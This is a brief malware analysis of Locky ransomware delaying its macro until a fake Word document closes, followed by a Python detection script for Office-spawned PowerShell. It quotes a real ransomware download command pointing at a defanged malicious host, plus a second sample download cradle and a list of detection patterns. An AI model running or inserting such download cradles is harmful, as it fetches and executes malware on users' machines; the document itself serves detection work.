The Locky ransomware attempts to evade detection by relying once more on simple, yet effective user interaction. It waits until the fake Word document is closed by the user before it starts to invoke a set of commands. The payload is downloaded and launched from the %appdata% folder, followed by the typical ransom note.

Strikes when you least expect it.

The command the macro runs once the document is closed (path separators and quoting restored; the name of the dropped file is truncated in the source):

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile("http://newhostrcm[.]top/admin.php?f=1", $env:APPDATA + "\sATTfJY.")
Source: https://blog.malwarebytes.com/threat-analysis/2017/08/locky-ransomware-adds-anti-sandbox-feature/
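As an added example (not code from the Malwarebytes write-up or from the page above), the following Python triage routine flags the behaviour described in the summary in process-creation telemetry: an Office application spawning PowerShell whose command line carries the no-profile, ExecutionPolicy Bypass, System.Net.WebClient, DownloadFile and %APPDATA% indicators seen in the quoted command. The event fields mirror what Sysmon Event ID 1 (or Security 4688) records; the sample events, the non-Locky command lines, the thresholds and the `.exe` extension on the dropped file are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessCreate:
    """Minimal process-creation record: the three fields that matter for
    this pattern. All values fed in below are constructed samples."""
    parent_image: str
    image: str
    command_line: str


OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Each indicator corresponds to a fragment of the command line quoted in the
# report: -nop, -Exec Bypass, New-Object System.Net.WebClient, .DownloadFile(
# and a drop path under $env:APPDATA. Matching is case-insensitive because
# PowerShell is.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("no-profile", re.compile(r"(?i)(^|\s)-nop(rofile)?\b")),
    ("exec-bypass", re.compile(r"(?i)(^|\s)-(ep|exec(utionpolicy)?)\s+bypass\b")),
    ("webclient", re.compile(r"(?i)new-object\s+system\.net\.webclient")),
    ("downloadfile", re.compile(r"(?i)\.downloadfile\s*\(")),
    ("appdata-drop", re.compile(r"(?i)\$env:appdata|%appdata%")),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matched_indicators(cmdline: str) -> List[str]:
    """Names of every indicator present in the command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def classify(ev: ProcessCreate, min_hits: int = 2) -> Tuple[str, List[str]]:
    """Verdict for one event.

    'alert'   : Office parent -> PowerShell with >= min_hits indicators
                (the macro-to-download-cradle chain in the report)
    'suspect' : same command-line indicators under any other parent
    'clean'   : not PowerShell, or too few indicators
    The indicator list is returned alongside so an analyst can see why.
    """
    if basename(ev.image) not in POWERSHELL:
        return "clean", []
    hits = matched_indicators(ev.command_line)
    office_parent = basename(ev.parent_image) in OFFICE_PARENTS
    if office_parent and len(hits) >= min_hits:
        return "alert", hits
    if len(hits) >= min_hits:
        return "suspect", hits
    return "clean", hits


# The command from the report; the ".exe" extension is assumed here because
# the source truncates the file name.
LOCKY_CMD = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"-nop -Exec Bypass -Command (New-Object System.Net.WebClient)"
    r'.DownloadFile("http://newhostrcm[.]top/admin.php?f=1", '
    r'$env:APPDATA + "\sATTfJY.exe")'
)

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD_PATH = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"

# Constructed sample telemetry: one Locky-style chain, two benign events and
# one download cradle launched from cmd.exe rather than Word.
SAMPLE_EVENTS = [
    ProcessCreate(WORD_PATH, PS_PATH, LOCKY_CMD),
    ProcessCreate(r"C:\Windows\explorer.exe", PS_PATH,
                  "powershell.exe -NoProfile -Command Get-Service"),
    ProcessCreate(WORD_PATH, r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcessCreate(r"C:\Windows\System32\cmd.exe", PS_PATH,
                  "powershell -nop -w hidden -c (New-Object System.Net.WebClient)"
                  ".DownloadFile('http://example.invalid/a', 'C:\\Users\\Public\\a.exe')"),
]


def triage(events: List[ProcessCreate]) -> List[Tuple[str, List[str]]]:
    """Classify every event, preserving order."""
    return [classify(ev) for ev in events]


if __name__ == "__main__":
    for ev, (verdict, hits) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{verdict:8} {basename(ev.parent_image)} -> {basename(ev.image)} {hits}")
```

The parent-process condition is what separates the report's chain from routine administrative PowerShell: the same cradle under cmd.exe is still worth a look, but Word launching it is the signal. Because the macro fires only on document close, the Word process may already be exiting when the child appears, so correlate on the recorded parent image rather than on whether Word is still running.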

